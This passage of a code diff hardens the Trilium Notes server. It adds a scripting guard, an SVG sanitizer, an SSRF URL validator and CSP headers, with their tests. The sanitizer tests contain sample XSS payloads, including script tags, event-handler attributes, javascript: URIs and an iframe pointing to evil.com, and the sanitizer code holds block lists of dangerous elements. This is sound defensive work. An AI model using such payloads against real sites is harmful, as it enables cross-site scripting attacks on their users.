+                return mockState.scriptingEnabled;
+            },
+            get sqlConsoleEnabled() {
+                return mockState.sqlConsoleEnabled;
+            }
+        }
+    }
+}));
+
+describe("scripting_guard", () => {
+    beforeEach(() => {
+        // Reset to defaults
+        mockState.isElectron = false;
+        mockState.scriptingEnabled = false;
+        mockState.sqlConsoleEnabled = false;
+        vi.resetModules();
+    });
+
+    describe("assertScriptingEnabled", () => {
+        it("should throw when scripting is disabled and not Electron", async () => {
+            mockState.isElectron = false;
+            mockState.scriptingEnabled = false;
+
+            // Re-mock utils with isElectron = false
+            vi.doMock("./utils.js", () => ({
+                isElectron: false,
+                default: { isElectron: false }
+            }));
+
+            const { assertScriptingEnabled } = await import("./scripting_guard.js");
+            expect(() => assertScriptingEnabled()).toThrowError(
+                /Script execution is disabled/
+            );
+        });
+
+        it("should not throw when scripting is enabled", async () => {
+            mockState.scriptingEnabled = true;
+
+            vi.doMock("./utils.js", () => ({
+                isElectron: false,
+                default: { isElectron: false }
+            }));
+
+            const { assertScriptingEnabled } = await import("./scripting_guard.js");
+            expect(() => assertScriptingEnabled()).not.toThrow();
+        });
+
+        it("should not throw when isElectron is true even if config is false", async () => {
+            mockState.scriptingEnabled = false;
+
+            vi.doMock("./utils.js", () => ({
+                isElectron: true,
+                default: { isElectron: true }
+            }));
+
+            const { assertScriptingEnabled } = await import("./scripting_guard.js");
+            expect(() => assertScriptingEnabled()).not.toThrow();
+        });
+    });
+
+    describe("assertSqlConsoleEnabled", () => {
+        it("should throw when SQL console is disabled and not Electron", async () => {
+            mockState.sqlConsoleEnabled = false;
+
+            vi.doMock("./utils.js", () => ({
+                isElectron: false,
+                default: { isElectron: false }
+            }));
+
+            const { assertSqlConsoleEnabled } = await import("./scripting_guard.js");
+            expect(() => assertSqlConsoleEnabled()).toThrowError(
+                /SQL console is disabled/
+            );
+        });
+
+        it("should not throw when SQL console is enabled", async () => {
+            mockState.sqlConsoleEnabled = true;
+
+            vi.doMock("./utils.js", () => ({
+                isElectron: false,
+                default: { isElectron: false }
+            }));
+
+            const { assertSqlConsoleEnabled } = await import("./scripting_guard.js");
+            expect(() => assertSqlConsoleEnabled()).not.toThrow();
+        });
+    });
+
+    describe("isScriptingEnabled", () => {
+        it("should return false when disabled and not Electron", async () => {
+            mockState.scriptingEnabled = false;
+
+            vi.doMock("./utils.js", () => ({
+                isElectron: false,
+                default: { isElectron: false }
+            }));
+
+            const { isScriptingEnabled } = await import("./scripting_guard.js");
+            expect(isScriptingEnabled()).toBe(false);
+        });
+
+        it("should return true when enabled", async () => {
+            mockState.scriptingEnabled = true;
+
+            vi.doMock("./utils.js", () => ({
+                isElectron: false,
+                default: { isElectron: false }
+            }));
+
+            const { isScriptingEnabled } = await import("./scripting_guard.js");
+            expect(isScriptingEnabled()).toBe(true);
+        });
+
+        it("should return true when isElectron is true", async () => {
+            mockState.scriptingEnabled = false;
+
+            vi.doMock("./utils.js", () => ({
+                isElectron: true,
+                default: { isElectron: true }
+            }));
+
+            const { isScriptingEnabled } = await import("./scripting_guard.js");
+            expect(isScriptingEnabled()).toBe(true);
+        });
+    });
+});

apps/server/src/services/scripting_guard.ts

@@ -0,0 +1,28 @@
+import config from "./config.js";
+import { isElectron } from "./utils.js";
+
+/**
+ * Throws if scripting is disabled. Desktop (Electron) always allows scripting.
+ */
+export function assertScriptingEnabled(): void {
+    if (isElectron || config.Scripting.enabled) {
+        return;
+    }
+    throw new Error(
+        "Script execution is disabled. Set [Scripting] enabled=true in config.ini or " +
+        "TRILIUM_SCRIPTING_ENABLED=true to enable. WARNING: Scripts have full server access."
+    );
+}
+
+export function assertSqlConsoleEnabled(): void {
+    if (isElectron || config.Scripting.sqlConsoleEnabled) {
+        return;
+    }
+    throw new Error(
+        "SQL console is disabled. Set [Scripting] sqlConsoleEnabled=true in config.ini to enable."
+    );
+}
+
+export function isScriptingEnabled(): boolean {
+    return isElectron || config.Scripting.enabled;
+}

apps/server/src/services/search/services/search.ts

@@ -17,6 +17,7 @@ import type { SearchParams, TokenStructure } from "./types.js";
 import type Expression from "../expressions/expression.js";
 import sql from "../../sql.js";
 import scriptService from "../../script.js";
+import { isScriptingEnabled } from "../../scripting_guard.js";
 import striptags from "striptags";
 import protectedSessionService from "../../protected_session.js";
 
@@ -80,6 +81,11 @@ function searchFromRelation(note: BNote, relationName: string) {
         return [];
     }
 
+    if (!isScriptingEnabled()) {
+        log.info("Script-based search is disabled (scripting is not enabled).");
+        return [];
+    }
+
     if (!scriptNote.isJavaScript() || scriptNote.getScriptEnv() !== "backend") {
         log.info(`Note ${scriptNote.noteId} is not executable.`);
 

apps/server/src/services/svg_sanitizer.spec.ts

@@ -0,0 +1,241 @@
+import { describe, expect, it } from "vitest";
+import { sanitizeSvg } from "./svg_sanitizer.js";
+
+describe("SVG Sanitizer", () => {
+    describe("removes dangerous elements", () => {
+        it("strips <script> tags with content", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><script>alert('XSS')</script><circle r="50"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<script");
+            expect(clean).not.toContain("alert");
+            expect(clean).toContain("<circle");
+        });
+
+        it("strips <script> tags case-insensitively", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><SCRIPT>alert('XSS')</SCRIPT></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("SCRIPT");
+            expect(clean).not.toContain("alert");
+        });
+
+        it("strips <script> tags with attributes", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><script type="text/javascript">alert('XSS')</script></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<script");
+            expect(clean).not.toContain("alert");
+        });
+
+        it("strips self-closing <script> tags", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><script src="evil.js"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<script");
+            expect(clean).not.toContain("evil.js");
+        });
+
+        it("strips <foreignObject> elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script></body></foreignObject></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("foreignObject");
+            expect(clean).not.toContain("alert");
+        });
+
+        it("strips <iframe> elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><iframe src="https://evil.com"></iframe></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<iframe");
+            expect(clean).not.toContain("evil.com");
+        });
+
+        it("strips <embed> elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><embed src="evil.swf"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<embed");
+        });
+
+        it("strips <object> elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><object data="evil.swf"></object></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<object");
+        });
+
+        it("strips <link> elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><link rel="stylesheet" href="evil.css"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<link");
+        });
+
+        it("strips <meta> elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><meta http-equiv="refresh" content="0;url=evil.com"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<meta");
+        });
+    });
+
+    describe("removes event handler attributes", () => {
+        it("strips onload from SVG root", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"><circle r="50"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("onload");
+            expect(clean).not.toContain("alert");
+            expect(clean).toContain("<circle");
+            expect(clean).toContain("<svg");
+        });
+
+        it("strips onclick from elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><circle r="50" onclick="alert('XSS')"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("onclick");
+            expect(clean).not.toContain("alert");
+            expect(clean).toContain("r=\"50\"");
+        });
+
+        it("strips onerror from elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><image onerror="alert('XSS')" href="x"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("onerror");
+            expect(clean).not.toContain("alert");
+        });
+
+        it("strips onmouseover from elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><rect onmouseover="alert('XSS')" width="100" height="100"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("onmouseover");
+        });
+
+        it("strips onfocus from elements", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><rect onfocus="alert('XSS')" tabindex="0"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("onfocus");
+        });
+    });
+
+    describe("removes dangerous URI schemes", () => {
+        it("strips javascript: URIs from href", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><a href="javascript:alert('XSS')"><text>Click</text></a></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("javascript:");
+            expect(clean).toContain("<text>Click</text>");
+        });
+
+        it("strips javascript: URIs from xlink:href", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><a xlink:href="javascript:alert('XSS')"><text>Click</text></a></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("javascript:");
+        });
+
+        it("strips data:text/html URIs", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><a href="data:text/html,<script>alert(1)</script>"><text>Click</text></a></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("data:text/html");
+        });
+
+        it("strips vbscript: URIs", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><a href="vbscript:msgbox('XSS')"><text>Click</text></a></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("vbscript:");
+        });
+
+        it("strips javascript: URIs with whitespace padding", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><a href="  javascript:alert(1)"><text>Click</text></a></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("javascript:");
+        });
+    });
+
+    describe("removes xml-stylesheet processing instructions", () => {
+        it("strips xml-stylesheet PIs", () => {
+            const dirty = `<?xml-stylesheet type="text/xsl" href="evil.xsl"?><svg xmlns="http://www.w3.org/2000/svg"><circle r="50"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("xml-stylesheet");
+            expect(clean).toContain("<circle");
+        });
+    });
+
+    describe("preserves legitimate SVG content", () => {
+        it("preserves basic SVG shapes", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="40" fill="red"/><rect x="10" y="10" width="80" height="80" fill="blue"/></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toBe(svg);
+        });
+
+        it("preserves SVG paths", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"><path d="M10 10 L90 90" stroke="black" stroke-width="2"/></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toBe(svg);
+        });
+
+        it("preserves SVG text elements", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"><text x="50" y="50" font-size="20">Hello World</text></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toBe(svg);
+        });
+
+        it("preserves SVG groups and transforms", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"><g transform="translate(10,10)"><circle r="5"/></g></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toBe(svg);
+        });
+
+        it("preserves SVG style elements with CSS (not script)", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"><style>.cls{fill:red}</style><circle class="cls" r="50"/></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toContain("<style>");
+            expect(clean).toContain("fill:red");
+        });
+
+        it("preserves SVG defs and gradients", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"><defs><linearGradient id="grad"><stop offset="0%" stop-color="red"/><stop offset="100%" stop-color="blue"/></linearGradient></defs><rect fill="url(#grad)" width="100" height="100"/></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toContain("linearGradient");
+            expect(clean).toContain("url(#grad)");
+        });
+
+        it("preserves safe href attributes (non-javascript)", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"><a href="https://example.com"><text>Link</text></a></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toContain(`href="https://example.com"`);
+        });
+
+        it("preserves data: URIs for images (non-HTML)", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"><image href="data:image/png;base64,abc123"/></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toContain("data:image/png;base64,abc123");
+        });
+
+        it("preserves empty SVG", () => {
+            const svg = `<svg xmlns="http://www.w3.org/2000/svg"></svg>`;
+            const clean = sanitizeSvg(svg);
+            expect(clean).toBe(svg);
+        });
+    });
+
+    describe("handles edge cases", () => {
+        it("handles Buffer input", () => {
+            const svg = Buffer.from(`<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>`);
+            const clean = sanitizeSvg(svg);
+            expect(clean).not.toContain("<script");
+        });
+
+        it("handles multiple script tags", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script><circle r="50"/><script>alert(2)</script></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("<script");
+            expect(clean).toContain("<circle");
+        });
+
+        it("handles mixed dangerous content", () => {
+            const dirty = `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><script>alert(2)</script><foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img onerror="alert(3)"/></body></foreignObject><circle r="50" onclick="alert(4)"/></svg>`;
+            const clean = sanitizeSvg(dirty);
+            expect(clean).not.toContain("alert");
+            expect(clean).not.toContain("onload");
+            expect(clean).not.toContain("<script");
+            expect(clean).not.toContain("foreignObject");
+            expect(clean).not.toContain("onclick");
+            expect(clean).toContain("<circle");
+        });
+
+        it("handles empty string input", () => {
+            expect(sanitizeSvg("")).toBe("");
+        });
+    });
+});

apps/server/src/services/svg_sanitizer.ts

@@ -0,0 +1,158 @@
+/**
+ * SVG sanitizer to prevent stored XSS via malicious SVG content.
+ *
+ * SVG files can contain embedded JavaScript via <script> tags, event handler
+ * attributes (onload, onclick, etc.), <foreignObject> elements, and
+ * javascript: URIs. This sanitizer strips all such dangerous constructs
+ * while preserving legitimate SVG rendering elements.
+ *
+ * Defense-in-depth: SVG responses also receive a restrictive
+ * Content-Security-Policy header (see {@link setSvgHeaders}) to block
+ * script execution even if sanitization is bypassed.
+ */
+
+import type { Response } from "express";
+
+// Elements that MUST be removed from SVG (they can execute code or embed arbitrary HTML)
+const DANGEROUS_ELEMENTS = new Set([
+    "script",
+    "foreignobject",
+    "iframe",
+    "embed",
+    "object",
+    "applet",
+    "base",
+    "link",       // can load external resources
+    "meta",
+]);
+
+// Attribute prefixes/names that indicate event handlers
+const EVENT_HANDLER_PATTERN = /^on[a-z]/i;
+
+// Dangerous attribute values (javascript:, data: with script content, vbscript:)
+const DANGEROUS_URI_PATTERN = /^\s*(javascript|vbscript|data\s*:\s*text\/html)/i;
+
+// Attributes that can contain URIs
+const URI_ATTRIBUTES = new Set([
+    "href",
+    "xlink:href",
+    "src",
+    "action",
+    "formaction",
+    "data",
+]);
+
+// SVG "set" and "animate" elements can modify attributes to dangerous values
+const DANGEROUS_ANIMATION_ATTRIBUTES = new Set([
+    "attributename",
+]);
+
+/**
+ * Sanitizes SVG content by removing dangerous elements and attributes
+ * that could lead to script execution (XSS).
+ *
+ * This uses regex-based parsing rather than a full DOM parser to avoid
+ * adding heavy dependencies. The approach is conservative: it removes
+ * known-dangerous constructs rather than allowlisting, but combined with
+ * the CSP header this provides robust protection.
+ */
+export function sanitizeSvg(svg: string | Buffer): string {
+    let content = typeof svg === "string" ? svg : svg.toString("utf-8");
+
+    // 1. Remove dangerous elements and their contents entirely.
+    //    Use a case-insensitive regex that handles self-closing and content-bearing tags.
+    for (const element of DANGEROUS_ELEMENTS) {
+        // Remove opening+closing tag pairs (including content between them)
+        const pairRegex = new RegExp(
+            `<${element}[\\s>][\\s\\S]*?<\\/${element}\\s*>`,
+            "gi"
+        );
+        content = content.replace(pairRegex, "");
+
+        // Remove self-closing variants
+        const selfClosingRegex = new RegExp(
+            `<${element}(\\s[^>]*)?\\/?>`,
+            "gi"
+        );
+        content = content.replace(selfClosingRegex, "");
+    }
+
+    // 2. Remove event handler attributes (onclick, onload, onerror, etc.)
+    //    and dangerous URI attributes from all remaining elements.
+    content = content.replace(/<([a-zA-Z][a-zA-Z0-9-]*)((?:\s+[^>]*?)?)(\s*\/?>)/g,
+        (_match, tagName, attrs, closing) => {
+            if (!attrs || !attrs.trim()) {
+                return `<${tagName}${closing}`;
+            }
+
+            // Parse and filter attributes
+            const sanitizedAttrs = sanitizeAttributes(attrs);
+            return `<${tagName}${sanitizedAttrs}${closing}`;
+        }
+    );
+
+    // 3. Remove processing instructions that could be exploited
+    content = content.replace(/<\?xml-stylesheet[^?]*\?>/gi, "");
+
+    return content;
+}
+
+/**
+ * Sanitizes the attribute string of an SVG element by removing
+ * event handlers and dangerous URI values.
+ */
+function sanitizeAttributes(attrString: string): string {
+    // Match individual attributes: name="value", name='value', name=value, or standalone name
+    return attrString.replace(
+        /\s+([a-zA-Z_:][\w:.-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|(\S+)))?/g,
+        (fullMatch, attrName, dblVal, sglVal, unquotedVal) => {
+            const lowerAttrName = attrName.toLowerCase();
+            const attrValue = dblVal ?? sglVal ?? unquotedVal ?? "";
+
+            // Remove all event handler attributes
+            if (EVENT_HANDLER_PATTERN.test(lowerAttrName)) {
+                return "";
+            }
+
+            // Check URI-bearing attributes for dangerous schemes
+            if (URI_ATTRIBUTES.has(lowerAttrName)) {
+                if (DANGEROUS_URI_PATTERN.test(attrValue)) {
+                    return "";
+                }
+            }
+
+            // Block animation elements from targeting event handlers via attributeName
+            if (DANGEROUS_ANIMATION_ATTRIBUTES.has(lowerAttrName)) {
+                const targetAttr = attrValue.toLowerCase();
+                if (EVENT_HANDLER_PATTERN.test(targetAttr) || targetAttr === "href" || targetAttr === "xlink:href") {
+                    return "";
+                }
+            }
+
+            return fullMatch;
+        }
+    );
+}
+
+/**
+ * Sets security headers appropriate for SVG responses.
+ * This provides defense-in-depth: even if SVG sanitization is somehow
+ * bypassed, the CSP header prevents script execution.
+ */
+export function setSvgHeaders(res: Response): void {
+    res.set("Content-Type", "image/svg+xml");
+    res.set("Cache-Control", "no-cache, no-store, must-revalidate");
+    // Restrictive CSP that allows SVG rendering but blocks all script execution,
+    // inline event handlers, and plugin-based content.
+    res.set(
+        "Content-Security-Policy",
+        "default-src 'none'; style-src 'unsafe-inline'; img-src 'self' data:; font-src 'self' data:"
+    );
+    // Prevent SVG from being reinterpreted in a different MIME context
+    res.set("X-Content-Type-Options", "nosniff");
+}
+
+export default {
+    sanitizeSvg,
+    setSvgHeaders
+};

apps/server/src/services/sync_update.ts

@@ -5,6 +5,8 @@ import eventService from "./events.js";
 import entityConstructor from "../becca/entity_constructor.js";
 import ws from "./ws.js";
 import type { EntityChange, EntityChangeRecord, EntityRow } from "@triliumnext/commons";
+import attributeService from "./attributes.js";
+import { isScriptingEnabled } from "./scripting_guard.js";
 
 interface UpdateContext {
     alreadyErased: number;
@@ -91,6 +93,18 @@ function updateNormalEntity(remoteEC: EntityChange, remoteEntityRow: EntityRow |
 
             preProcessContent(remoteEC, remoteEntityRow);
 
+            // When scripting is disabled, prefix dangerous attributes with 'disabled:'
+            // Same pattern as safeImport in attributes.ts
+            if (remoteEC.entityName === "attributes" && !isScriptingEnabled()) {
+                const attrRow = remoteEntityRow as Record<string, unknown>;
+                if (typeof attrRow.type === "string" && typeof attrRow.name === "string"
+                    && !attrRow.isDeleted
+                    && attributeService.isAttributeDangerous(attrRow.type, attrRow.name)) {
+                    log.info(`Sync: disabling dangerous attribute '${attrRow.name}' (scripting is disabled)`);
+                    attrRow.name = `disabled:${attrRow.name}`;
+                }
+            }
+
             sql.replace(remoteEC.entityName, remoteEntityRow);
 
             updateContext.updated[remoteEC.entityName] = updateContext.updated[remoteEC.entityName] || [];

apps/server/src/services/url_validator.ts

@@ -0,0 +1,140 @@
+/**
+ * URL validation utilities to prevent SSRF (Server-Side Request Forgery) attacks.
+ *
+ * These checks enforce scheme allowlists and optionally block requests to
+ * private/internal IP ranges so that user-controlled URLs cannot be used to
+ * reach local files or internal network services.
+ */
+
+import { URL } from "url";
+import log from "./log.js";
+
+/**
+ * IPv4 private and reserved ranges that should not be reachable from
+ * server-side HTTP requests initiated by user-supplied URLs.
+ */
+const PRIVATE_IPV4_RANGES: Array<{ prefix: number; mask: number }> = [
+    { prefix: 0x7F000000, mask: 0xFF000000 }, // 127.0.0.0/8       (loopback)
+    { prefix: 0x0A000000, mask: 0xFF000000 }, // 10.0.0.0/8        (private)
+    { prefix: 0xAC100000, mask: 0xFFF00000 }, // 172.16.0.0/12     (private)
+    { prefix: 0xC0A80000, mask: 0xFFFF0000 }, // 192.168.0.0/16    (private)
+    { prefix: 0xA9FE0000, mask: 0xFFFF0000 }, // 169.254.0.0/16    (link-local)
+    { prefix: 0x00000000, mask: 0xFF000000 }, // 0.0.0.0/8         (current network)
+];
+
+/**
+ * Parse a dotted-decimal IPv4 address into a 32-bit integer, or return null
+ * if the string is not a valid IPv4 literal.
+ */
+function parseIPv4(ip: string): number | null {
+    const parts = ip.split(".");
+    if (parts.length !== 4) return null;
+
+    let result = 0;
+    for (const part of parts) {
+        const octet = Number(part);
+        if (!Number.isInteger(octet) || octet < 0 || octet > 255) return null;
+        result = (result << 8) | octet;
+    }
+    // Convert to unsigned 32-bit
+    return result >>> 0;
+}
+
+/**
+ * Returns true when the hostname is a private/internal IPv4 address, an IPv6
+ * loopback (::1), or an IPv6 unique-local address (fc00::/7).
+ *
+ * DNS resolution is NOT performed here; the check only applies when the
+ * hostname is already an IP literal.  For full SSRF protection against DNS
+ * rebinding you would need an additional check after resolution, but
+ * blocking IP literals covers the most common attack vectors.
+ */
+function isPrivateIP(hostname: string): boolean {
+    // Strip IPv6 bracket notation that URL may retain.
+    const cleanHost = hostname.replace(/^\[|\]$/g, "");
+
+    // IPv6 checks
+    if (cleanHost === "::1") return true;
+    if (cleanHost.toLowerCase().startsWith("fc") || cleanHost.toLowerCase().startsWith("fd")) {
+        // fc00::/7 covers fc00:: through fdff::
+        return true;
+    }
+
+    // IPv4 check
+    const ipNum = parseIPv4(cleanHost);
+    if (ipNum !== null) {
+        for (const range of PRIVATE_IPV4_RANGES) {
+            if ((ipNum & range.mask) === (range.prefix >>> 0)) {
+                return true;
+            }
+        }
+    }
+
+    // "localhost" as a hostname (not an IP literal)
+    if (cleanHost.toLowerCase() === "localhost") {
+        return true;
+    }
+
+    return false;
+}
+
+/** Schemes that are safe for outbound HTTP(S) image downloads. */
+const ALLOWED_HTTP_SCHEMES = new Set(["http:", "https:"]);
+
+/**
+ * Validate that a URL is safe for server-side fetching (e.g. image downloads).
+ *
+ * Rules:
+ *  1. Only http: and https: schemes are permitted.
+ *  2. The hostname must not resolve to a private/internal IP range.
+ *
+ * Returns `true` when the URL passes all checks, `false` otherwise.
+ * Invalid / unparseable URLs also return `false`.
+ */
+export function isSafeUrlForFetch(urlStr: string): boolean {
+    try {
+        const parsed = new URL(urlStr);
+
+        if (!ALLOWED_HTTP_SCHEMES.has(parsed.protocol)) {
+            log.info(`URL rejected - disallowed scheme '${parsed.protocol}': ${urlStr}`);
+            return false;
+        }
+
+        if (isPrivateIP(parsed.hostname)) {
+            log.info(`URL rejected - private/internal IP '${parsed.hostname}': ${urlStr}`);
+            return false;
+        }
+
+        return true;
+    } catch {
+        log.info(`URL rejected - failed to parse: ${urlStr}`);
+        return false;
+    }
+}
+
+/**
+ * Validate that a base URL intended for an LLM provider API is using a safe
+ * scheme (http or https only).
+ *
+ * This is a lighter check than `isSafeUrlForFetch` because LLM base URLs are
+ * configured by authenticated administrators, so we only enforce the scheme
+ * restriction without blocking private IPs (which are legitimate for
+ * self-hosted services like Ollama).
+ *
+ * Returns `true` when the URL passes the check, `false` otherwise.
+ */
+export function isSafeProviderBaseUrl(urlStr: string): boolean {
+    try {
+        const parsed = new URL(urlStr);
+
+        if (!ALLOWED_HTTP_SCHEMES.has(parsed.protocol)) {
+            log.info(`LLM provider base URL rejected - disallowed scheme '${parsed.protocol}': ${urlStr}`);
+            return false;
+        }
+
+        return true;
+    } catch {
+        log.info(`LLM provider base URL rejected - failed to parse: ${urlStr}`);
+        return false;
+    }
+}

apps/server/src/share/content_renderer.ts

@@ -15,6 +15,7 @@ import BNote from "../becca/entities/bnote.js";
 import assetPath, { assetUrlFragment } from "../services/asset_path.js";
 import { generateCss, getIconPacks, MIME_TO_EXTENSION_MAPPINGS, ProcessedIconPack } from "../services/icon_packs.js";
 import log from "../services/log.js";
+import { isScriptingEnabled } from "../services/scripting_guard.js";
 import options from "../services/options.js";
 import utils, { getResourceDir, isDev, safeExtractMessageAndStackFromError } from "../services/utils.js";
 import SAttachment from "./shaca/entities/sattachment.js";
@@ -194,11 +195,13 @@ function renderNoteContentInternal(note: SNote | BNote, renderArgs: RenderArgs)
         t,
         isDev,
         utils,
+        sanitizeUrl,
         ...renderArgs,
     };
 
     // Check if the user has their own template.
-    if (note.hasRelation("shareTemplate")) {
+    // Skip user-provided EJS templates when scripting is disabled since EJS can execute arbitrary JS.
+    if (note.hasRelation("shareTemplate") && isScriptingEnabled()) {
         // Get the template note and content
         const templateId = note.getRelation("shareTemplate")?.value;
         const templateNote = templateId && shaca.getNote(templateId);
@@ -303,7 +306,9 @@ function renderIndex(result: Result) {
 
     for (const childNote of rootNote.getChildNotes()) {
         const isExternalLink = childNote.hasLabel("shareExternalLink");
-        const href = isExternalLink ? childNote.getLabelValue("shareExternalLink") : `./${childNote.shareId}`;
+        const rawHref = isExternalLink ? childNote.getLabelValue("shareExternalLink") : `./${childNote.shareId}`;
+        // Sanitize href to prevent javascript: / data: URI injection (CWE-79).
+        const href = isExternalLink ? escapeHtml(sanitizeUrl(rawHref ?? "")) : escapeHtml(rawHref ?? "");
         const target = isExternalLink ? `target="_blank" rel="noopener noreferrer"` : "";
         result.content += `<li><a class="${childNote.type}" href="${href}" ${target}>${childNote.escapedTitle}</a></li>`;
     }
@@ -407,7 +412,10 @@ function handleAttachmentLink(linkEl: HTMLElement, href: string, getNote: GetNot
         const linkedNote = getNote(noteId);
         if (linkedNote) {
             const isExternalLink = linkedNote.hasLabel("shareExternalLink");
-            const href = isExternalLink ? linkedNote.getLabelValue("shareExternalLink") : `./${linkedNote.shareId}`;
+            // Sanitize external links to prevent javascript: / data: URI injection (CWE-79).
+            const href = isExternalLink
+                ? sanitizeUrl(linkedNote.getLabelValue("shareExternalLink") ?? "")
+                : `./${linkedNote.shareId}`;
             if (href) {
                 linkEl.setAttribute("href", href);
             }

apps/server/src/share/routes.spec.ts

@@ -3,6 +3,7 @@ import supertest from "supertest";
 import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
 
 import { safeExtractMessageAndStackFromError } from "../services/utils.js";
+import config from "../services/config.js";
 
 let app: Application;
 
@@ -40,12 +41,19 @@ describe("Share API test", () => {
     });
 
     it("renders custom share template", async () => {
-        const response = await supertest(app)
-            .get("/share/pQvNLLoHcMwH")
-            .expect(200);
-        expect(cannotSetHeadersCount).toBe(0);
-        expect(response.text).toContain("Content Start");
-        expect(response.text).toContain("Content End");
+        // Custom EJS templates require scripting to be enabled
+        const originalEnabled = config.Scripting.enabled;
+        config.Scripting.enabled = true;
+        try {
+            const response = await supertest(app)
+                .get("/share/pQvNLLoHcMwH")
+                .expect(200);
+            expect(cannotSetHeadersCount).toBe(0);
+            expect(response.text).toContain("Content Start");
+            expect(response.text).toContain("Content End");
+        } finally {
+            config.Scripting.enabled = originalEnabled;
+        }
     });
 
 });

apps/server/src/share/routes.ts

@@ -4,6 +4,7 @@ import safeCompare from "safe-compare";
 import SearchContext from "../services/search/search_context.js";
 import searchService from "../services/search/services/search.js";
 import utils, { sanitizeSvg } from "../services/utils.js";
+import { setSvgHeaders } from "../services/svg_sanitizer.js";
 import { getDefaultTemplatePath, renderNoteContent } from "./content_renderer.js";
 import type SAttachment from "./shaca/entities/sattachment.js";
 import type SNote from "./shaca/entities/snote.js";
@@ -145,6 +146,13 @@ function register(router: Router) {
         addNoIndexHeader(note, res);
 
         if (note.isLabelTruthy("shareRaw") || typeof req.query.raw !== "undefined") {
+            // For HTML and SVG content, add restrictive Content-Security-Policy
+            // to prevent stored XSS via script execution (CWE-79).
+            if (note.mime === "text/html" || note.mime === "image/svg+xml") {
+                res.setHeader("Content-Security-Policy", "default-src 'none'; style-src 'unsafe-inline'; img-src * data:; font-src * data:");
+                res.setHeader("X-Content-Type-Options", "nosniff");
+            }
+
             res.setHeader("Content-Type", note.mime).send(note.getContent());
 
             return;
@@ -224,10 +232,17 @@ function register(router: Router) {
         }
 
         if (image.type === "image") {
-            // normal image
-            res.set("Content-Type", image.mime);
             addNoIndexHeader(image, res);
-            res.send(image.getContent());
+            if (image.mime === "image/svg+xml") {
+                // SVG images require sanitization to prevent stored XSS
